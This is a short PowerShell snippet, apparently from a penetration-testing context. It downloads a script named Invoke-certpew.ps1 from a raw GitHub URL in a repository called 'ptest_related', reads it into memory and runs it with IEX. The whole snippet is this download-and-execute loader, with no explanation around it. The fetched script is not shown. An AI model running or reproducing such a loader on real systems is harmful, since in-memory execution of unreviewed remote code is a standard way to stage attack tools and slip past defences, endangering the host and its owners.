$webreq = [System.Net.WebRequest]::Create("https://raw.githubusercontent.com/inkz1337/ptest_related/main/Invoke-certpew.ps1") 
$resp=$webreq.GetResponse() 
$respstream=$resp.GetResponseStream() 
$reader=[System.IO.StreamReader]::new($respstream) 
$content=$reader.ReadToEnd()
IEX($content)
